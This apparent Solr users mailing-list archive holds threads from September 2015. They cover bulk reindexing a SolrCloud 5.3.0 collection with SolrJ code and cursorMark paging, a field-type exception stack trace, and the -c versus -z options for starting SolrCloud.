Loved Erick's suggestion about not using a filter at all, sorting by > > uniqueId, and putting the last known uniqueId as the next query's start while still > > using cursor marks as follows > > > > SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" + > > markerSysId + " TO > > *]").setRows(1).addSort("uniqueId",ORDER.asc).setFields(new > > String[]{"uniqueId","uuid"}); > > q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark); > > > > 3. As per Shawn's advice, commented out autocommit and soft commit in > > solrconfig.xml, set openSearcher to false, and issued a MANUAL COMMIT for > > every batch from code as follows > > > > client.commit(true, true, true); > > > > Here is what the log statement & results - log.info("Indexed " + count + > > "/" + docList.get
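[Editor's note] The marker-based walk suggested above (sort by uniqueId ascending, then use the last id seen as the exclusive lower bound of the next query) can be sketched independently of SolrJ. In this minimal sketch a `TreeSet` stands in for the index and `fetchBatch` stands in for issuing the range query `+uniqueId:{marker TO *]` with `sort=uniqueId asc`; the class and method names are illustrative, not from the thread.

```java
import java.util.*;

// Sketch of marker-based paging: each batch asks only for ids strictly
// greater than the last id of the previous batch, so every doc is visited
// exactly once and the loop terminates even if matched docs are modified
// between batches. The TreeSet stands in for the Solr index.
public class MarkerPaging {
    // Stand-in for: query "+uniqueId:{marker TO *]" sorted by uniqueId asc, rows=rows
    static List<String> fetchBatch(NavigableSet<String> index, String marker, int rows) {
        List<String> batch = new ArrayList<>();
        for (String id : index.tailSet(marker, false)) { // strictly greater than marker
            batch.add(id);
            if (batch.size() == rows) break;
        }
        return batch;
    }

    static List<String> walkAll(NavigableSet<String> index, int rows) {
        List<String> seen = new ArrayList<>();
        String marker = "";                              // sorts before every real id
        while (true) {
            List<String> batch = fetchBatch(index, marker, rows);
            if (batch.isEmpty()) break;                  // nothing left past the marker
            seen.addAll(batch);                          // real code: sanitize + add docs
            marker = batch.get(batch.size() - 1);        // last id becomes next start
        }
        return seen;
    }

    public static void main(String[] args) {
        NavigableSet<String> index = new TreeSet<>(Arrays.asList("a1", "b2", "c3", "d4", "e5"));
        System.out.println(walkAll(index, 2));           // → [a1, b2, c3, d4, e5]
    }
}
```

Because the marker only moves forward, a doc that matches the query but not the replacement pattern cannot be returned twice, which avoids the endless-loop scenario Erick describes.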
Re: bulk reindexing 5.3.0 issue
Erick as per your advise I used cursorMarks (see code below). It was slightly better but Solr throws Exceptions randomly. Please look at the code and Stacktrace below 2015-09-26 01:00:45 INFO [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133 2015-09-26 01:00:49 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133 2015-09-26 01:00:54 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592 2015-09-26 01:00:58 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095 2015-09-26 01:01:03 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675 2015-09-26 01:01:10 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924 2015-09-26 01:01:15 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445 2015-09-26 01:01:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997 2015-09-26 01:01:24 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201 2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://xx.xx.xx.xx:/solr/collection1: missing content stream at org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560) at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234) at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226) at org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376) at org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328) at org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085) at org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856) at org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799) at org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135) at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107) at 
org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72) at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86) at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97) at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:606) at com.simontuffs.onejar.Boot.run(Boot.java:306) at com.simontuffs.onejar.Boot.main(Boot.java:159) 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! CODE protected static void processDocs() { try { CloudSolrClient client = new CloudSolrClient("zk1:,zk2:,zk3.com:"); client.setDefaultCollection("collection1"); boolean done = false; String cursorMark = CursorMarkParams.CURSOR_MARK_START; Integer count = 0; while (!done) { SolrQuery q = new SolrQuery("*:*").setRows(500).addSort("publishtime", ORDER.desc).addSort("uniqueId",ORDER.desc).setFields(new String[]{"uniqueId","uuid"}); q.addFilterQuery(new String[] {"uuid:[* TO *]", "uuid:sun.org.mozilla*"}); q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark); QueryResponse resp = client.query(q); String nextCursorMark = resp.getNextCursorMark(); SolrDocumentList docList = resp.getResults(); List inList = new ArrayList(); for(SolrDocument doc : docList) { SolrInputDocument iDoc = ClientUtils.toSolrInputDocument(doc); //This is my system's id String uniqueId = (String) iDoc.getFieldValue("uniqueId"); /* * This is another system's unique id which is what I want to correct that was messed * because of script transformer in DIH import via SolrEntityProcessor * ex- sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f */ String uuid = (String) iDoc.getFieldValue("uuid"); String sanitizedUUID = 
uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); Map<String,String> fieldModifier = new HashMap<String,String>(1); fieldModifier.put("set",sanitizedUUID); iDoc.setField("uuid", fieldModifier); inList.add(iDoc);
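[Editor's note] One plausible trigger for the "missing content stream" error in the stack trace above is calling `client.add(...)` with an empty document list, which can happen in this loop when a batch matches nothing — SolrJ then sends an update request with no body. That diagnosis is an assumption, not confirmed in the thread. A minimal sketch of the sanitize step plus an empty-batch guard, with `sendBatch` as a hypothetical stand-in for `client.add(inList)`:

```java
import java.util.*;

// Sanitize step from the code above, plus a guard so an update request is
// never issued for an empty batch (a plausible cause of Solr's
// "missing content stream" error from SolrJ add()).
public class SafeBatch {
    static final String PREFIX = "sun.org.mozilla.javascript.internal.NativeString:";

    static String sanitize(String uuid) {
        return uuid.replace(PREFIX, "");
    }

    // Returns true if the batch would be sent, false if skipped.
    static boolean sendBatch(List<String> batch) {
        if (batch.isEmpty()) {
            return false;          // guard: never call client.add(emptyList)
        }
        // real code: client.add(inList);
        return true;
    }

    public static void main(String[] args) {
        System.out.println(sanitize(PREFIX + "9cdef726-05dd-40b7-b1b2-c9bbce96741f"));
        System.out.println(sendBatch(new ArrayList<>()));  // false: skipped, not sent
    }
}
```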
bulk reindexing 5.3.0 issue
I have been trying to re-index about 1.5 million docs because one of the fields needed part of its string value removed (it was accidentally introduced). I was issuing a query for 100 docs, getting 4 fields, and updating the docs (atomic update with "set") via CloudSolrClient in batches. However, from time to time the query returns 0 results, which exits the re-indexing program. I can't understand why the cloud returns 0 results when there are 1.4 million docs which still have the "accidental" string in them. Is there another way to do bulk massive updates? Thanks Ravi Kiran Bhaskar
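[Editor's note] The atomic "set" update mentioned here works by sending, in place of the raw field value, a one-entry map `{"set" -> newValue}`; Solr then rewrites just that field on the stored document. The shape can be sketched with plain maps standing in for `SolrInputDocument` (class and field names here are illustrative):

```java
import java.util.*;

// Shape of an atomic "set" update: the document carries the unique key
// plus, for each field to change, a modifier map {"set" -> newValue}
// instead of a plain value. Plain maps stand in for SolrInputDocument.
public class AtomicSet {
    static Map<String, Object> setFieldUpdate(String id, String field, Object newValue) {
        Map<String, Object> doc = new LinkedHashMap<>();
        doc.put("uniqueId", id);                 // unique key must always be present
        Map<String, Object> modifier = new HashMap<>(1);
        modifier.put("set", newValue);           // "set" replaces the old value
        doc.put(field, modifier);
        return doc;
    }

    public static void main(String[] args) {
        // → {uniqueId=doc-1, uuid={set=9cdef726}}
        System.out.println(setFieldUpdate("doc-1", "uuid", "9cdef726"));
    }
}
```

Note that atomic updates only rewrite the named fields on the server side; all other fields must be stored for Solr to reconstruct the document.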
Re: bulk reindexing 5.3.0 issue
No problem Walter, it's all fun. Was just wondering if there was some other good way that I did not know of, that's all Thanks Ravi Kiran Bhaskar On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org> wrote: > Sorry, I did not mean to be rude. The original question did not say that > you don’t have the docs outside of Solr. Some people jump to the advanced > features and miss the simple ones. > > It might be faster to fetch all the docs from Solr and save them in files. > Then modify them. Then reload all of them. No guarantee, but it is worth a > try. > > Good luck. > > wunder > Walter Underwood > wun...@wunderwood.org <javascript:;> > http://observer.wunderwood.org/ (my blog) > > > > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com > <javascript:;>> wrote: > > > > Walter, Not in a mood for banter right now Its 6:00pm on a friday and > > Iam stuck here trying to figure reindexing issues :-) > > I dont have source of docs so I have to query the SOLR, modify and put it > > back and that is seeming to be quite a task in 5.3.0, I did reindex > several > > times with 4.7.2 in a master slave env without any issue. Since then we > > have moved to cloud and it has been a pain all day. > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org > <javascript:;>> > > wrote: > > > >> Sure. > >> > >> 1. Delete all the docs (no commit). > >> 2. Add all the docs (no commit). > >> 3. Commit. > >> > >> wunder > >> Walter Underwood > >> wun...@wunderwood.org <javascript:;> > >> http://observer.wunderwood.org/ (my blog) > >> > >> > >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com > <javascript:;>> wrote: > >>> > >>> I have been trying to re-index the docs (about 1.5 million) as one of > the > >>> field needed part of string value removed (accidentally introduced). 
I > >> was > >>> issuing a query for 100 docs getting 4 fields and updating the doc > >> (atomic > >>> update with "set") via the CloudSolrClient in batches, However from > time > >> to > >>> time the query returns 0 results, which exits the re-indexing program. > >>> > >>> I cant understand as to why the cloud returns 0 results when there are > >> 1.4x > >>> million docs which have the "accidental" string in them. > >>> > >>> Is there another way to do bulk massive updates ? > >>> > >>> Thanks > >>> > >>> Ravi Kiran Bhaskar > >> > >> > >
Re: bulk reindexing 5.3.0 issue
Walter, not in a mood for banter right now. It's 6:00 pm on a Friday and I am stuck here trying to figure out reindexing issues :-) I don't have the source of the docs, so I have to query Solr, modify, and put it back, and that is proving to be quite a task in 5.3.0. I did reindex several times with 4.7.2 in a master-slave env without any issue. Since then we have moved to cloud and it has been a pain all day. Thanks Ravi Kiran Bhaskar On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org> wrote: > Sure. > > 1. Delete all the docs (no commit). > 2. Add all the docs (no commit). > 3. Commit. > > wunder > Walter Underwood > wun...@wunderwood.org > http://observer.wunderwood.org/ (my blog) > > > > On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com> wrote: > > > > I have been trying to re-index the docs (about 1.5 million) as one of the > > field needed part of string value removed (accidentally introduced). I > was > > issuing a query for 100 docs getting 4 fields and updating the doc > (atomic > > update with "set") via the CloudSolrClient in batches, However from time > to > > time the query returns 0 results, which exits the re-indexing program. > > > > I cant understand as to why the cloud returns 0 results when there are > 1.4x > > million docs which have the "accidental" string in them. > > > > Is there another way to do bulk massive updates ? > > > > Thanks > > > > Ravi Kiran Bhaskar > >
Re: bulk reindexing 5.3.0 issue
Thanks for responding Erick. I set "start" to zero and "rows" always to 100. I create a CloudSolrClient instance and use it both to query and to index. But I do sleep for 5 secs just to allow for any auto commits. So: query --> client.add(100 docs) --> wait --> query again. But the weird thing I noticed was that after 8 or 9 batches, i.e. 800/900 docs, the "query again" returns zero docs, causing my while loop to exit... so I was trying to see if I was doing the right thing or if there is an alternate way to do heavy indexing. Thanks Ravi Kiran Bhaskar On Friday, September 25, 2015, Erick Erickson <erickerick...@gmail.com> wrote: > How are you querying Solr? You say you query for 100 docs, > update then get the next set. What are you using for a marker? > If you're using the start parameter, and somehow a commit is > creeping in things might be weird, especially if you're using any > of the internal Lucene doc IDs. If you're absolutely sure no commits > are taking place even that should be OK. > > The "deep paging" stuff could be helpful here, see: > > https://lucidworks.com/blog/coming-soon-to-solr-efficient-cursor-based-iteration-of-large-result-sets/ > > Best, > Erick > > On Fri, Sep 25, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com>> wrote: > > No problem Walter, it's all fun. Was just wondering if there was some > other > > good way that I did not know of, that's all > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org>> > > wrote: > > > >> Sorry, I did not mean to be rude. The original question did not say that > >> you don’t have the docs outside of Solr. Some people jump to the > advanced > >> features and miss the simple ones. > >> > >> It might be faster to fetch all the docs from Solr and save them in > files. > >> Then modify them. Then reload all of them. No guarantee, but it is > worth a > >> try. > >> > >> Good luck. 
> >> > >> wunder > >> Walter Underwood > >> wun...@wunderwood.org <javascript:;> <javascript:;> > >> http://observer.wunderwood.org/ (my blog) > >> > >> > >> > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com > <javascript:;> > >> <javascript:;>> wrote: > >> > > >> > Walter, Not in a mood for banter right now Its 6:00pm on a friday > and > >> > Iam stuck here trying to figure reindexing issues :-) > >> > I dont have source of docs so I have to query the SOLR, modify and > put it > >> > back and that is seeming to be quite a task in 5.3.0, I did reindex > >> several > >> > times with 4.7.2 in a master slave env without any issue. Since then > we > >> > have moved to cloud and it has been a pain all day. > >> > > >> > Thanks > >> > > >> > Ravi Kiran Bhaskar > >> > > >> > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood < > wun...@wunderwood.org <javascript:;> > >> <javascript:;>> > >> > wrote: > >> > > >> >> Sure. > >> >> > >> >> 1. Delete all the docs (no commit). > >> >> 2. Add all the docs (no commit). > >> >> 3. Commit. > >> >> > >> >> wunder > >> >> Walter Underwood > >> >> wun...@wunderwood.org <javascript:;> <javascript:;> > >> >> http://observer.wunderwood.org/ (my blog) > >> >> > >> >> > >> >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com > <javascript:;> > >> <javascript:;>> wrote: > >> >>> > >> >>> I have been trying to re-index the docs (about 1.5 million) as one > of > >> the > >> >>> field needed part of string value removed (accidentally > introduced). I > >> >> was > >> >>> issuing a query for 100 docs getting 4 fields and updating the doc > >> >> (atomic > >> >>> update with "set") via the CloudSolrClient in batches, However from > >> time > >> >> to > >> >>> time the query returns 0 results, which exits the re-indexing > program. > >> >>> > >> >>> I cant understand as to why the cloud returns 0 results when there > are > >> >> 1.4x > >> >>> million docs which have the "accidental" string in them. 
> >> >>> > >> >>> Is there another way to do bulk massive updates ? > >> >>> > >> >>> Thanks > >> >>> > >> >>> Ravi Kiran Bhaskar > >> >> > >> >> > >> > >> >
Re: bulk reindexing 5.3.0 issue
thank you for taking time to help me out. Yes I was not using cursorMark, I will try that next. This is what I was doing, its a bit shabby coding but what can I say my brain was fried :-) FYI this is a side process just to correct a messed up string. The actual indexing process was working all the time as our business owners are a bit petulant about stopping indexing. My autocommit conf and code is given below, as you can see autocommit should fire every 100 docs anyway 100 12 3 private static void processDocs() { try { CloudSolrClient client = new CloudSolrClient("zk1:,zk2:,zk3.com:"); client.setDefaultCollection("collection1"); //First initialize docs SolrDocumentList docList = getDocs(client, 100); Long count = 0L; while (docList != null && docList.size() > 0) { List inList = new ArrayList(); for(SolrDocument doc : docList) { SolrInputDocument iDoc = ClientUtils.toSolrInputDocument(doc); //This is my SOLR's Unique id String uniqueId = (String) iDoc.getFieldValue("uniqueId"); /* * This is another system's id which is what I want to correct. 
Was messed * because of script transformer in DIH import via SolrEntityProcessor * ex- sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f */ String uuid = (String) iDoc.getFieldValue("uuid"); String sanitizedUUID = uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); Map<String,String> fieldModifier = new HashMap<String,String>(1); fieldModifier.put("set",sanitizedUUID); iDoc.setField("uuid", fieldModifier); inList.add(iDoc); log.info("added " + systemid); } client.add(inList); count = count + docList.size(); log.info("Indexed " + count + "/" + docList.getNumFound()); Thread.sleep(5000); docList = getDocs(client, docList.size()); log.info("Got Docs- " + docList.getNumFound()); } } catch (Exception e) { log.error("Error indexing ", e); } } private static SolrDocumentList getDocs(CloudSolrClient client, Integer rows) { SolrQuery q = new SolrQuery("*:*"); q.setSort("publishtime", ORDER.desc); q.setStart(0); q.setRows(rows); q.addFilterQuery(new String[] {"uuid:[* TO *]", "uuid:sun.org.mozilla*"}); q.setFields(new String[]{"uniqueId","uuid"}); SolrDocumentList docList = null; QueryResponse resp; try { resp = client.query(q); docList = resp.getResults(); } catch (Exception e) { log.error("Error querying " + q.toString(), e); } return docList; } Thanks Ravi Kiran Bhaskar On Fri, Sep 25, 2015 at 10:58 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Wait, query again how? You've got to have something that keeps you > from getting the same 100 docs back so you have to be sorting somehow. > Or you have a high water mark. Or something. Waiting 5 seconds for any > commit also doesn't really make sense to me. I mean how do you know > > 1> that you're going to get a commit (did you explicitly send one from > the client?). > 2> all autowarming will be complete by the time the next query hits? > > Let's see the query you fire. 
There has to be some kind of marker that > you're using to know when you've gotten through the entire set. > > And I would use much larger batches, I usually update in batches of > 1,000 (excepting if these are very large docs of course). I suspect > you're spending a lot more time sleeping than you need to. I wouldn't > sleep at all in fact. This is one (rare) case I might consider > committing from the client. If you specify the wait for searcher param > (server.commit(true, true), then it doesn't return until a new > searcher is completely opened so your previous updates will be > reflected in your next search. > > Actually, what I'd really do is > 1> turn off all auto commits > 2> go ahead and query/change/update. But the query bits would be using > the cursormark. > 3> do NOT commit > 4> issue a commit when you were all done. > > I bet you'd get through your update a lot fa
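[Editor's note] Erick's four-step recipe above (turn off autocommits, walk the index with a cursor, never commit per batch, issue a single commit at the end) can be captured as logic without a running Solr. In this sketch a `Session` stub just counts adds and commits so the pattern is checkable; in real code `add` would be `client.add(batch)` and `commit` a single `client.commit(true, true)` after the loop. All names here are illustrative.

```java
import java.util.*;

// Erick's recipe as pure logic: process every batch with no intermediate
// commits, then commit exactly once. The Session class stands in for a
// SolrJ client and merely records what was requested.
public class CommitOnce {
    static class Session {
        int added = 0, commits = 0;
        void add(List<String> docs) { added += docs.size(); }
        void commit() { commits++; }
    }

    static Session reindex(List<String> allDocs, int batchSize) {
        Session s = new Session();
        for (int start = 0; start < allDocs.size(); start += batchSize) {
            int end = Math.min(start + batchSize, allDocs.size());
            s.add(allDocs.subList(start, end)); // update batch, do NOT commit here
        }
        s.commit();                             // single commit once everything is in
        return s;
    }

    public static void main(String[] args) {
        Session s = reindex(Arrays.asList("a", "b", "c", "d", "e"), 2);
        System.out.println(s.added + " docs, " + s.commits + " commit"); // 5 docs, 1 commit
    }
}
```

Skipping per-batch commits also removes the need for the 5-second sleeps, since no searcher is reopened until the final commit.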
Weird Exception
(qtp1256054824-13) [c:collection1 s:shard1 r:core_node2 x:collection1_shard1_replica4] o.a.s.c.S.Request [collection1_shard1_replica4] webapp=/solr path=/select params={sort=_docid_+asc=*:*=false=javabin=2=0} status=500 QTime=1 2015-09-24 01:43:33.668 ERROR (qtp1256054824-13) [c:collection1 s:shard1 r:core_node2 x:collection1_shard1_replica4] o.a.s.s.SolrDispatchFilter null:java.lang.IllegalStateException: Type mismatch: pubdatetime was indexed with multiple values per document, use SORTED_SET instead at org.apache.lucene.uninverting.FieldCacheImpl$SortedDocValuesCache.createValue(FieldCacheImpl.java:679) at org.apache.lucene.uninverting.FieldCacheImpl$Cache.get(FieldCacheImpl.java:190) at org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:647) at org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:627) at org.apache.lucene.uninverting.UninvertingReader.getSortedDocValues(UninvertingReader.java:257) at org.apache.lucene.index.MultiDocValues.getSortedValues(MultiDocValues.java:316) at org.apache.lucene.index.SlowCompositeReaderWrapper.getSortedDocValues(SlowCompositeReaderWrapper.java:125) at org.apache.lucene.index.DocValues.getSortedSet(DocValues.java:304) at org.apache.solr.search.function.OrdFieldSource.getValues(OrdFieldSource.java:99) at org.apache.lucene.queries.function.FunctionQuery$AllScorer.(FunctionQuery.java:116) at org.apache.lucene.queries.function.FunctionQuery$FunctionWeight.scorer(FunctionQuery.java:93) at org.apache.lucene.search.BooleanWeight.scorer(BooleanWeight.java:274) at org.apache.lucene.search.Weight.bulkScorer(Weight.java:135) at org.apache.lucene.search.BooleanWeight.bulkScorer(BooleanWeight.java:256) at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:769) at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:486) at org.apache.solr.search.SolrIndexSearcher.buildAndRunCollectorChain(SolrIndexSearcher.java:200) at 
org.apache.solr.search.SolrIndexSearcher.getDocListNC(SolrIndexSearcher.java:1682) at org.apache.solr.search.SolrIndexSearcher.getDocListC(SolrIndexSearcher.java:1501) at org.apache.solr.search.SolrIndexSearcher.search(SolrIndexSearcher.java:555) at org.apache.solr.handler.component.QueryComponent.process(QueryComponent.java:522) at org.apache.solr.handler.component.SearchHandler.handleRequestBody(SearchHandler.java:277) at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:143) at org.apache.solr.core.SolrCore.execute(SolrCore.java:2068) at org.apache.solr.servlet.HttpSolrCall.execute(HttpSolrCall.java:669) at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:462) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:210) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:179) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1652) at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:585) at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143) at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:577) at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:223) at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1127) at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:515) at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:185) at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1061) at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141) at org.eclipse.jetty.server.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:215) at org.eclipse.jetty.server.handler.HandlerCollection.handle(HandlerCollection.java:110) at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97) at 
org.eclipse.jetty.server.Server.handle(Server.java:499) at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:310) at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:257) at org.eclipse.jetty.io.AbstractConnection$2.run(AbstractConnection.java:540) at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:635) at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:555) at java.lang.Thread.run(Thread.java:745)
Re: SolrCloud Startup question
Thanks Anshum On Mon, Sep 21, 2015 at 6:23 PM, Anshum Gupta <ans...@anshumgupta.net> wrote: > CloudSolrClient is thread safe and it is highly recommended you reuse the > client. > > If you are providing an HttpClient instance while constructing, make sure > that the HttpClient uses a multi-threaded connection manager. > > On Mon, Sep 21, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com> wrote: > > > Thank you Anshum & Upayavira. > > > > BTW do any of you guys know if CloudSolrClient is ThreadSafe ?? > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net> > > wrote: > > > > > Hi Ravi, > > > > > > I just tried it out and here's my understanding: > > > > > > 1. Starting Solr with -c starts Solr in cloud mode. This is used to > start > > > Solr with an embedded zookeeper. > > > 2. Starting Solr with -z starts Solr in cloud mode, with the zk > > connection > > > string you specify. You don't need to explicitly specify -c in this > case. > > > The help text there needs a bit of fixing though > > > > > > * -zZooKeeper connection string; only used when running in > > > SolrCloud mode using -c* > > > * To launch an embedded ZooKeeper instance, don't > pass > > > this parameter.* > > > > > > *"only used when running in SolrCloud mode using -c" *needs to be > > rephrased > > > or removed. Can you create a JIRA for the same? > > > > > > > > > On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com > > > <javascript:;>> wrote: > > > > > > > Can somebody kindly help me understand the difference between the > > > following > > > > startup calls ? > > > > > > > > ./solr start -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > > > > > Vs > > > > > > > > ./solr start -c -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > > > > > What happens if i don't pass the "-c" option ?? I read the > > documentation > > > > but got more confused, I do run a ZK ensemble of 3 instances. 
FYI my > > > cloud > > > > seems to work fine and teh Admin UI shows Cloud graph just fine, but > I > > > want > > > > to just make sure I am doing the right thing and not missing any > > nuance. > > > > > > > > The following is form documention on cwiki. > > > > --- > > > > > > > > "Start Solr in SolrCloud mode, which will also launch the embedded > > > > ZooKeeper instance included with Solr. > > > > > > > > This option can be shortened to simply -c. > > > > > > > > If you are already running a ZooKeeper ensemble that you want to use > > > > instead of the embedded (single-node) ZooKeeper, you should also pass > > the > > > > -z parameter." > > > > > > > > - > > > > > > > > Thanks > > > > > > > > Ravi Kiran Bhaskar > > > > > > > > > > > > > > > > -- > > > Anshum Gupta > > > > > > > > > -- > Anshum Gupta >
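[Editor's note] Since CloudSolrClient is thread safe and reuse is recommended (per Anshum above), the usual pattern is a single shared instance for the whole application rather than one per thread. A minimal sketch with a stub client (an `AtomicInteger` counter standing in for the real class, whose construction and HttpClient wiring are omitted):

```java
import java.util.concurrent.*;
import java.util.concurrent.atomic.AtomicInteger;

// One shared client instance used from many threads. StubClient stands in
// for CloudSolrClient; the atomic counter shows the shared object handles
// concurrent calls without per-thread copies.
public class SharedClient {
    static class StubClient {                  // stand-in for CloudSolrClient
        final AtomicInteger requests = new AtomicInteger();
        void query(String q) { requests.incrementAndGet(); }
    }

    public static void main(String[] args) throws Exception {
        StubClient client = new StubClient();  // built once, shared by all workers
        ExecutorService pool = Executors.newFixedThreadPool(4);
        for (int i = 0; i < 100; i++) {
            pool.submit(() -> client.query("*:*"));
        }
        pool.shutdown();
        pool.awaitTermination(10, TimeUnit.SECONDS);
        System.out.println(client.requests.get()); // 100
    }
}
```

If a custom HttpClient is supplied to the real CloudSolrClient, it must use a multi-threaded connection manager, as noted in the reply above.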
Re: SolrCloud Startup question
Thank you Anshum & Upayavira. BTW do any of you guys know if CloudSolrClient is ThreadSafe ?? Thanks, Ravi Kiran Bhaskar On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net> wrote: > Hi Ravi, > > I just tried it out and here's my understanding: > > 1. Starting Solr with -c starts Solr in cloud mode. This is used to start > Solr with an embedded zookeeper. > 2. Starting Solr with -z starts Solr in cloud mode, with the zk connection > string you specify. You don't need to explicitly specify -c in this case. > The help text there needs a bit of fixing though > > * -zZooKeeper connection string; only used when running in > SolrCloud mode using -c* > * To launch an embedded ZooKeeper instance, don't pass > this parameter.* > > *"only used when running in SolrCloud mode using -c" *needs to be rephrased > or removed. Can you create a JIRA for the same? > > > On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com > <javascript:;>> wrote: > > > Can somebody kindly help me understand the difference between the > following > > startup calls ? > > > > ./solr start -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > Vs > > > > ./solr start -c -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 > > > > What happens if i don't pass the "-c" option ?? I read the documentation > > but got more confused, I do run a ZK ensemble of 3 instances. FYI my > cloud > > seems to work fine and teh Admin UI shows Cloud graph just fine, but I > want > > to just make sure I am doing the right thing and not missing any nuance. > > > > The following is form documention on cwiki. > > --- > > > > "Start Solr in SolrCloud mode, which will also launch the embedded > > ZooKeeper instance included with Solr. > > > > This option can be shortened to simply -c. > > > > If you are already running a ZooKeeper ensemble that you want to use > > instead of the embedded (single-node) ZooKeeper, you should also pass the > > -z parameter." 
> > > > - > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > > > -- > Anshum Gupta >
SolrCloud Startup question
